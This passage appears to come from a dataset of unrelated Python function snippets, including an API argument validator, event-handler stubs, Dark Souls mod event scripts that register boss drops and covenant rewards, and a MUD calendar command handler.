args.get('end_time', '')\n date_time = dateparser.parse(end_time)\n if date_time:\n params['end_time'] = str(\n date_time.strftime(API_SUPPORT_DATE_FORMAT)\n )\n else:\n raise ValueError(\n MESSAGES['INVALID_TIME_VALIDATION'].format('end_time')\n )\n\n if 'mvx_correlated_only' in arg_keys:\n mvx_correlated_only = args.get('mvx_correlated_only', '').lower()\n try:\n mvx_correlated_only = argToBoolean(mvx_correlated_only)\n params['mvx_correlated_only'] = mvx_correlated_only\n except ValueError:\n raise ValueError(\n MESSAGES['INVALID_BOOLEAN_VALUE_ERROR'].format(\n 'mvx_correlated_only'\n )\n )\n\n return params", "def events(self) -> Dict[EventCall, Set[Node]]:\n return self._events", "def handleEvents(self, events):\n pass", "def visit_event(self, event):", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _default_events_fetcher(self):\n raise NotImplementedError", "def _receive_multiple(self, what, address, **kwargs):\n\n print('_receive_multiple: please override me.')", "def get_timeline_events(self, req, start, stop, filters):", "def set_events(self, events, extended=False):\r\n if extended:\r\n plog (\"DEBUG\", \"SETEVENTS EXTENDED %s\\r\\n\" % \" \".join(events))\r\n self.sendAndRecv(\"SETEVENTS EXTENDED %s\\r\\n\" % \" \".join(events))\r\n else:\r\n self.sendAndRecv(\"SETEVENTS %s\\r\\n\" % \" \".join(events))", "def event0():\n header(0, 0)\n end_if_client()\n\n if DEBUG.GET_MASTER_KEY:\n flag.disable(50004066)\n item.award_item_to_host_only(4073)\n if DEBUG.HAS_RUSTBONE:\n flag.enable(EVENT.HasBonerust)\n if DEBUG.SPEED_UP_PLAYER:\n chr.set_special_effect(CHR.Player, 2370)\n if DEBUG.GET_CHTHONIC_SPARK:\n flag.disable(50001510) # Thrall Spark drop flag.\n item.award_item_to_host_only(ITEMLOT.ThrallReward)\n\n for flag_id in (760, 762, 765):\n flag.disable(flag_id)\n\n # Display a message after an event flag is enabled (with optional delay).\n run_event_with_slot(260, 0, args=(11810000, 10010600, 0), arg_types='iif') # Arrival in Lordran.\n run_event_with_slot(260, 1, args=(257, 10010610, 0), arg_types='iif') # Rite of Kindling.\n run_event_with_slot(260, 2, args=(EVENT.ObtainedChthonicSpark, 10010620, 0), arg_types='iif') # Chthonic Spark.\n run_event_with_slot(260, 3, args=(11412053, 10010621, 0), arg_types='iif') # Chthonic Spark stolen.\n run_event_with_slot(260, 4, args=(EVENT.LordvesselReceived, TEXT.LordvesselWarpUnlocked, 0), arg_types='iif')\n\n # Assorted events (see documentation). Mostly monitoring states. 710 monitors warping ability.\n for event_id in (761, 763, 290, 701, 702, 717, 718,\n 706, 740, 750, 752, 757, 758, 759,\n 754, 770, 772, 730, 731, 766, 710):\n run_event(event_id)\n\n # Monitor Lord Souls/Shard possession. 
Doesn't include Dark Remnant.\n run_event_with_slot(711, 0, args=(2500, 711)) # Gravelord Nito\n run_event_with_slot(711, 1, args=(2501, 712)) # Bed of Chaos\n run_event_with_slot(711, 2, args=(2502, 713)) # Four Kings\n run_event_with_slot(711, 3, args=(2503, 714)) # Seath the Scaleless\n\n run_event(715) # Player has Gwyn's Soul.\n run_event(716) # Player has Sunlight Spear.\n run_event(11512000) # (New) Player has been given Lordvessel.\n\n # Monitor Estus upgrade level.\n for slot, args in enumerate(zip(range(202, 215, 2), range(203, 216, 2))):\n run_event_with_slot(8131, slot, args)\n\n run_event(819) # Monitor repair box sync.\n\n run_event(2540) # (New) Ring of the Embraced punishes you if removed.\n run_event(2541) # (New) Ring of Temptation activates after 15 seconds.\n run_event(2542) # (New) Ring of Temptation takes your souls and breaks if you die.\n run_event(2543) # (New) Ring of the Evil Eye kill reward.\n run_event(2544) # (New) Twilight Ring effect starts and ends.\n run_event(2545) # (New) Twilight Ring effect waxes and wanes.\n run_event(2546) # (New) Bond to Beyond has a 5% chance of giving one soft humanity.\n run_event(2547) # (New) Contract and heal Bonerust (11302050)\n run_event(2548) # (New) Kills heal with Nahr Alma pact.\n run_event(2549) # (New) Ring of Condemnation recharges.\n run_event(11502020) # (New) Lithic Witness event.\n run_event(11502023) # (New) Beyond Witness event.\n\n # (New) Toggles availability of full bonfire menu based on Spark possession.\n run_event(11512005)\n\n # BOSS DROPS\n\n for slot, args in enumerate((\n # boss_dead_flag, immediate_item_lot, delayed_item_lot_1, delayed_item_lot_2\n (2, ITEMLOT.AriamisReward, 9020, 9030),\n (11010901, ITEMLOT.TaurusDemonReward, 9000, 9030),\n (11010904, ITEMLOT.ProfaneImageReward, 0, 0),\n (3, ITEMLOT.BellGargoylesReward, 9020, 0),\n (4, ITEMLOT.CrossbreedPriscillaReward, 9020, 0),\n (11200900, ITEMLOT.MoonlightButterflyReward, 9000, 0),\n (11200901, ITEMLOT.GravestalkersReward, 9030, 0),\n (5, ITEMLOT.AbyssArtoriasReward, 9000, 0),\n (6, ITEMLOT.PinwheelReward, 9000, 9030),\n (7, ITEMLOT.NitoReward, 9000, 9030),\n (9, ITEMLOT.QuelaagReward, 9020, 0),\n (11410902, ITEMLOT.CeaselessDischargeReward, 9000, 9030),\n (11412055, ITEMLOT.JeremiahReward, 9000, 0),\n (11410901, ITEMLOT.CentipedeDemonReward, 9000, 9030),\n (10, ITEMLOT.BedOfChaosReward, 9000, 9030),\n (11, ITEMLOT.SensGolemReward, 9000, 0),\n (11510900, ITEMLOT.GwyndolinReward, 0, 0),\n (11510901, ITEMLOT.JareelReward, 0, 0),\n (11510902, ITEMLOT.OrnsteinReward, 9000, 0),\n (11510903, ITEMLOT.SmoughReward, 9000, 0),\n (11012012, ITEMLOT.ThrallReward, 0, 0),\n (13, ITEMLOT.FourKingsReward, 9010, 0),\n (14, ITEMLOT.SeathReward, 9000, 0),\n (11800001, ITEMLOT.GwynCinderReward, 0, 0),\n (16, ITEMLOT.AsylumDemonReward, 9000, 0),\n (11810901, ITEMLOT.StrayDemonReward, 9000, 9030),\n (11810902, ITEMLOT.AsylumTyrantReward, 9000, 9030),\n (11210000, ITEMLOT.SanctuaryGuardianReward, 9000, 0),\n (11210001, ITEMLOT.ArtoriasReward, 0, 0),\n (11212006, ITEMLOT.ManusReward, 9040, 0),\n (11210004, ITEMLOT.KalameetReward, 0, 0),\n (11212008, ITEMLOT.TwilightVagrantReward, 0, 0),\n (11512201, ITEMLOT.GwynLightReward, 0, 0),\n )):\n run_event_with_slot(1950, slot, args)\n\n # (New) Monitor Velka's pact. 
(1910 is enabled in Firelink Shrine.)\n run_event(1915) # Monitor pact breaking.\n run_event(1916) # Monitor Seath punishment.\n run_event(1917) # Monitor Nito punishment.\n run_event(1918) # Monitor Jeremiah punishment.\n\n # (New) Monitor challenge pacts.\n run_event(1900) # Kremmel.\n run_event(1901) # Zandroe.\n run_event(1902) # Caitha.\n run_event(1903) # Nahr Alma.\n run_event(1904) # Quella permanent Abyss warp.\n run_event(1905) # Monitor Etched Ring removal and curse player (non-Quella).\n run_event(1906) # Quella ring removal.\n\n run_event(1920) # (New) Return Xanthous Crown on next load when dropped. Uses 1921.\n run_event(1922) # (New) Warp to special Painted World event when Soul of Ariamis is consumed.\n run_event(1923) # (New) Award Chaos Fire Whip when Soul of the Exile is consumed.\n run_event(1924) # (New) Skeletons in Tomb go back to rest when you load a map other than Tomb or Catacombs.\n run_event(1925) # (New) Manages Dark Ember damage boost stacks.\n run_event(11025400) # (New) Manages Ruinous Hand kill charge-up.\n run_event(1926) # (New) Trigger Ruinous Hand explosion at full charge.\n run_event(1927) # (New) HP penalty for being hollow (25%).\n\n run_event(2510) # (New) Sable Rune control.\n run_event(2511) # (New) Lustrous Rune control.\n run_event(2512) # (New) Wraith Rune control.\n run_event(2513) # (New) Scintilla Rune control.\n run_event(2514) # (New) Omphalic Rune control.\n run_event(2515) # (New) Omphalic Rune kill counter and death trigger.\n run_event(2516) # (New) Pale White Rune control.\n run_event(2517) # (New) Reaper's Rune trigger.\n run_event(2518) # (New) Reaper's Rune kill counter.\n run_event(2519) # (New) Rhythm Rune triggers.\n run_event(2520) # (New) Ransackers Rune trigger.\n # (New) Ransackers Rune item map checks. (2521-2530) (No Kiln, no Asylum.)\n for slot, (block, area) in enumerate(((10, 0), (10, 1), (10, 2), (11, 0), (12, 0), (12, 1),\n (13, 0), (13, 1), (13, 2), (14, 0), (14, 1), (15, 0),\n (15, 1), (16, 0), (17, 0))):\n args = tuple([block, area] + [50000 + 100 * slot + 10 * i for i in range(0, 10)])\n run_event_with_slot(2521, slot, args=args, arg_types='BBiiiiiiiiii')\n \n # Activate Runes.\n for slot, rune in enumerate(range(9)):\n run_event_with_slot(2600, slot, args=(90 + rune, 11025350 + rune))\n\n # Monitor availability of bonfire options\n for slot, args in enumerate(zip(range(2600, 2610), range(250, 260))):\n run_event_with_slot(250, slot, args)\n\n # Remove Embers from inventory when given to blacksmiths. These are removed aggressively and repeatedly!\n for slot_args in zip((0, 1, 2, 6, 7, 8, 9, 10, 12),\n zip((350, 351, 352, 356, 357, 358, 359, 360, 362),\n (800, 801, 802, 806, 807, 808, 809, 810, 812))):\n run_event_with_slot(350, slot_args[0], slot_args[1])\n\n # (NEW) Chthonic Spark version of the above event, which also requires Vamos to be alive.\n run_event_with_slot(363, 0, args=(363, 813))\n\n # Monitor reinforcement material possession.\n for slot, args in enumerate(zip(range(1000, 1131, 10), range(780, 794))):\n run_event_with_slot(780, slot, args)\n\n # Monitor covenant membership.\n for slot, args in enumerate(zip(range(0, 10), range(850, 860))):\n run_event_with_slot(870, slot, args)\n\n # Covenant joining events. 
(args = trigger_flag, player_animation, rotation_target, looping_animation)\n for slot, args in enumerate(zip(range(840, 850), (7905, 7905, 7905, 7905, 7898, 7905, 7905, 7913, 7905, 7905),\n (6370, 6072, 6080, 6001, 10000, 6340, 6341, 10000, 6380, 1400700),\n (-1, -1, -1, -1, 7896, -1, -1, 7911, -1, -1))):\n run_event_with_slot(840, slot, args)\n\n # Monitor NG+ level. Uses flags 690 (NG) to 705 (NG+15).\n run_event_with_slot(690, 0, args=(600, 4, 16, 1175))\n\n run_event(719) # Monitor possession of any spell.\n run_event(720) # Monitor possession of any pyromancy.\n\n # Monitor whether shops are sold out.\n # NOTE: This all suggests that shopkeeper flags are in the 7000 range for their area. Avoid!\n run_event(721) # Big Hat Logan in Duke's Archives.\n run_event(722) # Quelana of Izalith.\n run_event(723) # Griggs at Firelink Shrine.\n run_event(724) # Male Undead Merchant. (I don't think this does anything.)\n run_event(725) # Checks if you've bought 2+ items from Logan in Duke's Archives.\n run_event(726) # Checks if you've bought 2+ items from Ingward in New Londo Ruins.\n run_event(727) # Checks flags in Ash Lake / Great Hollow. Not sure who this is.\n\n run_event(745) # Cut Shiva questline I think.\n run_event(818) # Black Eye Orb quivers in Anor Londo.\n run_event(810) # Monitor possession of Lautrec's Black Eye Orb.\n # Lautrec frees himself from New Londo if both item flags below are enabled.\n run_event_with_slot(812, 0, args=(51400150,)) # Monitor possession of Blighttown Fire Keeper Soul (moved).\n run_event_with_slot(812, 1, args=(51010050,)) # Monitor possession of Undead Parish Humanity (still on altar).\n run_event(822) # Disable flag 830 half a second after leaving the Kiln. (Frampt pickup.)\n run_event(823) # Disable flag 831 half a second after leaving the Kiln. (Kaathe pickup.)\n\n # (New) Monitor dead NPCs for Twilight Vagrant. 
Counts friendly or hollow death, unless noted otherwise.\n for slot, npc_dead_flag in enumerate((\n 1073, # 2051: Oscar (friendly) (must be enabled in tutorial)\n 1097, # 2052: Big Hat Logan\n 1115, # 2053: Griggs\n 1005, # 2054: Solaire (note this won't trigger if he is killed when Hollow, unlike other NPCs)\n 1254, # 2055: Laurentius\n 1462, # 2056: Crestfallen Warrior\n 1575, # 2057: Lautrec\n 1604, # 2058: Shiva\n 1628, # 2059: Patches\n 1899, # 2060: Havel\n 1864, # 2061: Ciaran (in Oolacile and/or with Nito)\n 1823, # 2062: Hawkeye Gough\n 5, # 2063: Artorias (in Darkroot)\n )):\n run_event_with_slot(11212050, slot + 1, args=(npc_dead_flag,))\n\n # (New) Monitor Tomb of the Giants presence to send Giant Skeletons back to sleep.\n run_event(11310201)\n\n # (New) Monitor picking up Chthonic Spark for the first time to display message.\n run_event(11512004)\n\n # EVENT REWARDS (covenants, storylines)\n\n run_event_with_slot(910, 0, args=(11400591, 1280)) # Joining Chaos Servants.\n run_event_with_slot(911, 0, args=(11010591, 1000, 1), arg_types='iiB')\n run_event_with_slot(911, 1, args=(11510590, 1010, 1), arg_types='iiB')\n run_event_with_slot(911, 2, args=(11700591, 1020, 1), arg_types='iiB')\n run_event_with_slot(911, 3, args=(11000591, 1030, 1), arg_types='iiB')\n run_event_with_slot(911, 4, args=(11400590, 1040, 1), arg_types='iiB')\n run_event_with_slot(911, 5, args=(11410594, 1050, 1), arg_types='iiB')\n run_event_with_slot(911, 6, args=(11020594, 1060, 1), arg_types='iiB')\n run_event_with_slot(911, 7, args=(11020595, 1070, 1), arg_types='iiB')\n run_event_with_slot(911, 8, args=(11810590, 1082, 1), arg_types='iiB')\n run_event_with_slot(911, 9, args=(11810591, 1080, 1), arg_types='iiB')\n run_event_with_slot(911, 10, args=(11510592, 1090, 1), arg_types='iiB')\n run_event_with_slot(911, 11, args=(11600592, 1100, 1), arg_types='iiB')\n run_event_with_slot(911, 12, args=(11020602, 1110, 1), arg_types='iiB')\n run_event_with_slot(911, 13, args=(11010594, 1120, 1), arg_types='iiB')\n run_event_with_slot(911, 14, args=(11010595, 1130, 1), arg_types='iiB')\n run_event_with_slot(911, 15, args=(11020599, 1140, 1), arg_types='iiB')\n run_event_with_slot(911, 16, args=(11020607, 1150, 1), arg_types='iiB')\n run_event_with_slot(911, 17, args=(11200592, 1160, 1), arg_types='iiB')\n run_event_with_slot(911, 18, args=(11200593, 1170, 1), arg_types='iiB')\n run_event_with_slot(911, 19, args=(11200594, 1180, 1), arg_types='iiB')\n run_event_with_slot(911, 20, args=(11300590, 1190, 1), arg_types='iiB')\n run_event_with_slot(911, 21, args=(11300591, 1200, 1), arg_types='iiB')\n run_event_with_slot(911, 22, args=(11310590, 1210, 1), arg_types='iiB')\n run_event_with_slot(911, 23, args=(11310592, 1220, 1), arg_types='iiB')\n run_event_with_slot(911, 24, args=(11310593, 1230, 1), arg_types='iiB')\n run_event_with_slot(911, 25, args=(11310594, 1240, 1), arg_types='iiB')\n run_event_with_slot(911, 26, args=(11320590, 1250, 1), arg_types='iiB')\n run_event_with_slot(911, 27, args=(11320581, 1260, 1), arg_types='iiB')\n run_event_with_slot(911, 28, args=(11320593, 1270, 1), arg_types='iiB')\n run_event_with_slot(911, 29, args=(11400592, 1290, 1), arg_types='iiB')\n run_event_with_slot(911, 30, args=(11400594, 1300, 1), arg_types='iiB')\n run_event_with_slot(911, 31, args=(11400596, 1310, 1), arg_types='iiB')\n run_event_with_slot(911, 32, args=(11400597, 1320, 1), arg_types='iiB')\n run_event_with_slot(911, 33, args=(11400598, 1330, 1), arg_types='iiB')\n run_event_with_slot(911, 34, args=(11400599, 
1340, 1), arg_types='iiB')\n run_event_with_slot(911, 35, args=(11510595, 1350, 1), arg_types='iiB')\n run_event_with_slot(911, 36, args=(11510596, 1360, 1), arg_types='iiB')\n run_event_with_slot(911, 37, args=(11510597, 1370, 1), arg_types='iiB')\n run_event_with_slot(911, 38, args=(11600594, 1380, 1), arg_types='iiB')\n run_event_with_slot(911, 39, args=(11600595, 1390, 1), arg_types='iiB')\n run_event_with_slot(911, 40, args=(11600596, 1400, 1), arg_types='iiB')\n run_event_with_slot(911, 41, args=(11010598, 1410, 0), arg_types='iiB')\n run_event_with_slot(911, 42, args=(11210590, 1500, 1), arg_types='iiB')\n run_event_with_slot(911, 43, args=(11210593, 1510, 1), arg_types='iiB')\n run_event_with_slot(911, 44, args=(11210594, 1520, 1), arg_types='iiB')\n run_event_with_slot(911, 45, args=(11600580, 1401, 1), arg_types='iiB')\n run_event_with_slot(911, 46, args=(11600581, 1402, 1), arg_types='iiB')\n run_event_with_slot(911, 47, args=(11600582, 1403, 1), arg_types='iiB')\n run_event_with_slot(911, 48, args=(11600583, 1404, 1), arg_types='iiB')\n run_event_with_slot(890, 0, args=(11310580, 1221, 1), arg_types='iiB') # 911 ran out of slots (up against 960).\n run_event_with_slot(890, 1, args=(11510580, 1361, 1), arg_types='iiB')\n run_event_with_slot(890, 2, args=(11510581, 1371, 1), arg_types='iiB')\n run_event_with_slot(890, 3, args=(11320592, 1261, 1), arg_types='iiB')\n\n # DIRECT NPC DEATH REWARDS (960-969)\n run_event_with_slot(960, 0, args=(1315, 6180, 1100)) # Ingward (Key to the Seal)\n run_event_with_slot(960, 1, args=(1402, 6230, 6230)) # Undead Merchant (Orange Soapstone)\n # run_event_with_slot(960, 2, args=(1198, 6080, 1140)) # Petrus (Lift Chamber Key) (dies before killing Rhea)\n # run_event_with_slot(960, 3, args=(1196, 6080, 1140)) # Petrus (Lift Chamber Key) (dies after killing Rhea)\n\n # NEW GAME PLUS: Bring covenant ranks up to date, and prevent gifts from being re-awarded.\n run_event_with_slot(8200, 0, args=(3, 5500, 50000120, 11010594))\n run_event_with_slot(8200, 1, args=(3, 5510, 50000130, 11010595))\n run_event_with_slot(8200, 2, args=(2, 103, 50000160, 11200592))\n run_event_with_slot(8200, 3, args=(3, 240, 50000170, 11200593))\n run_event_with_slot(8200, 4, args=(2, 124, 50000180, 11200594))\n run_event_with_slot(8200, 5, args=(0, 453000, 50000220, 11310592))\n run_event_with_slot(8200, 6, args=(3, 5100, 50000225, 11310580))\n run_event_with_slot(8200, 7, args=(3, 5110, 50000230, 11310593))\n run_event_with_slot(8200, 8, args=(3, 114, 50000265, 11320581))\n run_event_with_slot(8200, 9, args=(3, 377, 50000260, 11320592))\n run_event_with_slot(8200, 10, args=(3, 378, 50000270, 11320593))\n run_event_with_slot(8200, 11, args=(3, 4500, 50000310, 11400596))\n run_event_with_slot(8200, 12, args=(3, 4520, 50000320, 11400597))\n run_event_with_slot(8200, 13, args=(3, 4510, 50000330, 11400598))\n run_event_with_slot(8200, 14, args=(2, 130, 50000350, 11510595))\n run_event_with_slot(8200, 15, args=(3, 113, 50000360, 11510596))\n run_event_with_slot(8200, 16, args=(2, 102, 50000365, 11510580))\n run_event_with_slot(8200, 17, args=(3, 5910, 50000370, 11510597))\n run_event_with_slot(8200, 18, args=(0, 1366000, 50000375, 11510581))\n run_event_with_slot(8200, 19, args=(0, 904000, 50000380, 11600594))\n run_event_with_slot(8200, 20, args=(3, 102, 50000390, 11600595))\n run_event_with_slot(8200, 21, args=(0, 210000, 50000400, 11600596))\n run_event_with_slot(8200, 22, args=(1, 40000, 50000410, 11600580))\n run_event_with_slot(8200, 23, args=(1, 41000, 50000420, 11600581))\n 
run_event_with_slot(8200, 24, args=(1, 42000, 50000430, 11600582))\n run_event_with_slot(8200, 25, args=(1, 43000, 50000440, 11600583))\n\n # Same as above, but for other special rewards.\n run_event_with_slot(8300, 0, args=(ItemType.good, 100, 50000000)) # White Sign Soapstone\n run_event_with_slot(8300, 1, args=(ItemType.good, 101, 51100330)) # Red Sign Soapstone\n run_event_with_slot(8300, 2, args=(ItemType.good, 102, 50000390)) # Red Eye Orb\n run_event_with_slot(8300, 3, args=(ItemType.good, 106, 11017020)) # Orange Guidance Soapstone\n run_event_with_slot(8300, 4, args=(ItemType.good, 108, 11607020)) # Book of the Guilty\n run_event_with_slot(8300, 5, args=(ItemType.good, 112, 11407080)) # Servant Roster\n run_event_with_slot(8300, 6, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 7, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 8, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n run_event_with_slot(8300, 9, args=(ItemType.good, 2508, 11007010)) # Unknown - seems unused.\n\n # NOTE: Flag 8310 onwards is used for NPC humanity registration.\n\n # Same as above for DLC items.\n run_event_with_slot(8090, 0, args=(ItemType.good, 510, 11217010))\n run_event_with_slot(8090, 1, args=(ItemType.good, 511, 11217020))\n run_event_with_slot(8090, 2, args=(ItemType.good, 512, 11217030))\n run_event_with_slot(8090, 3, args=(ItemType.good, 513, 11217040))\n run_event_with_slot(8090, 4, args=(ItemType.good, 514, 11217050))\n\n # (New) Same as above, but for Runes and other new items.\n run_event_with_slot(11022100, 0, args=(ItemType.good, 900, 51010020))\n run_event_with_slot(11022100, 1, args=(ItemType.good, 901, 51510690))\n run_event_with_slot(11022100, 2, args=(ItemType.good, 902, 51200120))\n run_event_with_slot(11022100, 3, args=(ItemType.good, 903, 51410030))\n run_event_with_slot(11022100, 4, args=(ItemType.good, 904, 51810080))\n run_event_with_slot(11022100, 5, args=(ItemType.good, 905, 51700020))\n run_event_with_slot(11022100, 6, args=(ItemType.good, 906, 51300220))\n run_event_with_slot(11022100, 7, args=(ItemType.good, 907, 51300221))\n run_event_with_slot(11022100, 8, args=(ItemType.good, 908, 51210290))\n run_event_with_slot(11022100, 9, args=(ItemType.ring, 133, 50000650)) # Velka gift (Ring of Condemnation)\n run_event_with_slot(11022100, 10, args=(ItemType.ring, 124, 50001780)) # Twilight Vagrant drop (Twilight Ring)\n run_event_with_slot(11022100, 11, args=(ItemType.ring, 105, 50004900)) # Lithic Bond\n run_event_with_slot(11022100, 12, args=(ItemType.ring, 107, 50004910)) # Serous Bond\n run_event_with_slot(11022100, 13, args=(ItemType.ring, 106, 50004920)) # Empyrean Bond\n run_event_with_slot(11022100, 14, args=(ItemType.ring, 108, 50004930)) # Bond to Beyond\n # Leaving slots 11022100-11022119 dedicated to this.\n\n # (NEW) Remove some additional new items in NG+.\n run_event_with_slot(11022120, 0, args=(ItemType.ring, 152)) # Ashen Ring\n run_event_with_slot(11022120, 1, args=(ItemType.ring, 151)) # Gwynevere's Ring\n run_event_with_slot(11022120, 2, args=(ItemType.good, 220)) # Silver Pendant\n run_event_with_slot(11022120, 3, args=(ItemType.armor, 294000)) # Xanthous Crown (true)\n run_event_with_slot(11022120, 4, args=(ItemType.ring, 149)) # Darkmoon Seance Ring", "def do_target_event_switches(self):\n caller = self.caller\n lhslist = self.lhs.split(\"/\")\n if len(lhslist) > 1:\n lhs = lhslist[0]\n rhs = lhslist[1]\n else:\n lhs = self.lhs\n rhs = self.rhs\n if 
\"sponsor\" in self.switches:\n from django.core.exceptions import ObjectDoesNotExist\n\n event = self.get_event_from_args(self.rhs)\n try:\n org = Organization.objects.get(name__iexact=self.lhslist[0])\n except Organization.DoesNotExist:\n raise self.CalCmdError(\"No Organization by that name.\")\n if not org.access(self.caller, \"withdraw\"):\n raise self.CalCmdError(\n \"You do not have permission to spend funds for %s.\" % org\n )\n if event.finished:\n raise self.CalCmdError(\"Try as you might, you cannot alter the past.\")\n try:\n amount = int(self.lhslist[1])\n if amount < 1:\n raise ValueError\n except (TypeError, ValueError):\n raise self.CalCmdError(\n \"You must provide a positive number of social resources to add.\"\n )\n try:\n sponsoring = event.add_sponsorship(org, amount)\n except ObjectDoesNotExist:\n raise self.CalCmdError(\n \"The organization must be invited before they can sponsor.\"\n )\n self.msg(\n \"%s is now sponsoring %s for %d social resources.\"\n % (org, event, sponsoring.social)\n )\n return\n event = self.get_event_from_args(lhs)\n if \"join\" in self.switches:\n diff = time_from_now(event.date).total_seconds()\n if diff > 3600:\n caller.msg(\"You cannot join the event until closer to the start time.\")\n return\n if event.plotroom is None:\n caller.msg(\n \"That event takes place on the normal grid, so you can just walk there.\"\n )\n return\n if event.location is None:\n caller.msg(\"That event has no location to join.\")\n return\n caller.msg(\"Moving you to the event location.\")\n mapping = {\"secret\": True}\n caller.char_ob.move_to(event.location, mapping=mapping)\n # display info on a given event\n if not rhs:\n caller.msg(event.display(), options={\"box\": True})\n return\n try:\n num = int(rhs)\n if num < 1:\n raise ValueError\n comments = list(\n event.comments.filter(db_tags__db_key=\"white_journal\").order_by(\n \"-db_date_created\"\n )\n )\n caller.msg(caller.char_ob.messages.disp_entry(comments[num - 1]))\n return\n except (ValueError, TypeError):\n caller.msg(\"Must leave a positive number for a comment.\")\n return\n except IndexError:\n caller.msg(\"No entry by that number.\")\n return", "def event0():\n header(0, 0)\n\n if DEBUG.GET_CHTHONIC_SPARK:\n item.award_item_to_host_only(1600)\n if DEBUG.GET_DARKMOON_SEANCE_RING:\n item.award_item_to_host_only(1600310)\n if DEBUG.GWYNDOLIN_DEAD:\n flag.enable(EVENT.GwyndolinDead)\n item.award_item_to_host_only(2600)\n if DEBUG.ORNSTEIN_AND_SMOUGH_DEAD:\n flag.enable(EVENT.OrnsteinAndSmoughDead)\n if DEBUG.DARK_ANOR_LONDO:\n flag.enable(EVENT.OrnsteinAndSmoughDead)\n flag.enable(EVENT.GwyndolinDead)\n flag.enable(EVENT.DarkAnorLondo)\n if DEBUG.GET_LAUTREC_BLACK_EYE_ORB:\n item.award_item_to_host_only(2034)\n if DEBUG.CAPRICIOUS_THRALL_ACTIVE:\n flag.enable(EVENT.CapriciousThrallActive)\n if DEBUG.GET_BUTTERFLY_SOUL:\n item.award_item_to_host_only(2530)\n item.award_item_to_host_only(0)\n if DEBUG.DISABLE_FOG_ARCHER:\n chr.disable(CHR.SilverKnightArcherNearBossFog)\n if DEBUG.JAREEL_DEAD:\n flag.enable(EVENT.JareelDead)\n\n skip_if_event_flag_off(1, EVENT.OrnsteinAndSmoughDead)\n map.register_bonfire(11510920, 1511950)\n for bonfire_flag, bonfire_id, kindle_level in zip((11510992, 11510984, 11510976), (1511960, 1511961, 1511962),\n (10, 0, 0)):\n map.register_bonfire(bonfire_flag, bonfire_id, initial_kindle_level=kindle_level)\n map.register_ladder(11510010, 11510011, 1511140)\n map.register_ladder(11510012, 11510013, 1511141)\n\n # Make elevator work immediately (and skip cutscene).\n 
flag.enable(11510305)\n\n flag.disable(11510304)\n skip_if_client(2)\n obj.disable(1511994)\n sfx.delete_map_sfx(1511995, False)\n obj.disable(1511310)\n for hitbox_id in (1513301, 1513302, 1513303):\n hitbox.disable_hitbox(hitbox_id)\n skip_if_event_flag_off(1, 11510300)\n skip_if_event_flag_off(6, 11510303)\n flag.disable(11510301)\n flag.disable(11510302)\n flag.enable(11510303)\n anim.end_animation(1511300, 53)\n hitbox.enable_hitbox(1513303)\n skip(13)\n skip_if_event_flag_off(6, 11510302)\n flag.disable(11510301)\n flag.enable(11510302)\n flag.disable(11510303)\n anim.end_animation(1511300, 50)\n hitbox.enable_hitbox(1513302)\n skip(6)\n skip_if_event_flag_off(5, 11510301)\n flag.enable(11510301)\n flag.disable(11510302)\n flag.disable(11510303)\n anim.end_animation(1511300, 51)\n hitbox.enable_hitbox(1513301)\n\n obj.disable(1511450)\n flag.disable(11510460)\n run_event_with_slot(11510090, 0, (1511700, 1511701, 1512600, 1512601))\n run_event_with_slot(11510090, 1, (1511702, 1511703, 1512602, 1512603))\n\n for event_id in (11515040, 11515041, 11515042):\n run_event(event_id)\n\n run_event(11510200) # Rotating lever to open palace.\n run_event(11510205) # (New) Rotating lever to open palace in Dark Anor Londo (Jareel must be dead).\n run_event(11510201) # Palace locked from the outside.\n run_event(11510100) # Break chandelier.\n run_event(11510210) # Open one-way gate to blacksmith.\n run_event(11510211) # Blacksmith gate is locked.\n run_event(11510220) # First activation of gondola. (Now pre-enabled.)\n run_event(11510300) # Main gondola activation.\n run_event(11510319) # Gondola flags.\n run_event(11510340) # Gondola navimesh.\n run_event(11510350) # Gondola sync.\n run_event(11510310) # Gondola lever can't be pushed.\n run_event(11515250) # Painting Guardian ambush.\n run_event(11515251) # Provoke a Silver Knight.\n run_event(11510110) # Open door to Sun Chamber. 
(Now requires key.)\n run_event(11510111) # (New) Sun Chamber is locked.\n run_event(11510400) # Trigger Dark Anor Londo.\n run_event(11510401) # Disable Darkmoon Tomb statue.\n run_event(11510230) # Enter Painted World if you have the Painted Doll.\n run_event(11510240) # Return to Sen's Fortress.\n run_event(11515050) # Offend Pale Demon and cut off Fortress return.\n run_event(11510120) # Enable special effect 4501 in Darkmoon Tomb.\n run_event(11510130) # (Updated) Control Dark Anor Londo enemies.\n # (Gone) Player always respawns at 'Anor Londo' bonfire in Dark Anor Londo.\n run_event(11510460) # Kneel to Darkmoon Covenant.\n run_event(11510462) # Two-frame sync for above.\n run_event(11510461) # Kneel to Darkmoon Covenant, simple version.\n run_event(11510140) # Move your bloodstain out of endless Gwyndolin corridor when you win.\n run_event(11510150) # Trigger flag for quivering Black Eye Orb.\n run_event(11512008) # (New) Message that Thrall has fled higher again.\n\n run_event(11512043) # (NEW) Monitor resting at Sun Chamber bonfire for warping (11512045).\n run_event(11512044) # (NEW) Monitor resting at Gwyn's Altar bonfire for warping (11512046).\n\n run_event(151)\n run_event(11510215)\n\n # Sentinel shield parts.\n for slot, sentinel_id in zip(range(14), range(1510400, 1510414)):\n run_event_with_slot(11515060, slot, (sentinel_id,))\n\n # Gargoyle tails removed.\n\n # One-way shortcut doors.\n run_event_with_slot(11510260, 0, (11510251, 1512251, 1512250), 'iii')\n run_event_with_slot(11510260, 1, (11510257, 1512253, 1512252), 'iii')\n run_event_with_slot(11510260, 2, (11510258, 1512255, 1512254), 'iii')\n\n # ORNSTEIN AND SMOUGH / GWYN, LORD OF LIGHT\n\n sound.disable_map_sound(1513800) # Ornstein and Smough.\n sound.disable_map_sound(1513805) # Gwyn.\n\n # GWYN:\n run_event(11512200) # Gwyn trigger.\n run_event(11512201) # Gwyn death.\n skip_if_event_flag_on(22, EVENT.AnorLondoGwynWarp) # Skip O&S events (light and dark). Keep an eye on length.\n\n skip_if_event_flag_off(10, EVENT.OrnsteinAndSmoughDead)\n # Already dead:\n anim.force_animation(1511401, 0, loop=True) # Start elevators\n anim.force_animation(1511402, 0, loop=True)\n run_event(11515392)\n for fog_wall, fog_sfx in zip((1511990, 1511992, 1511988), (1511991, 1511993, 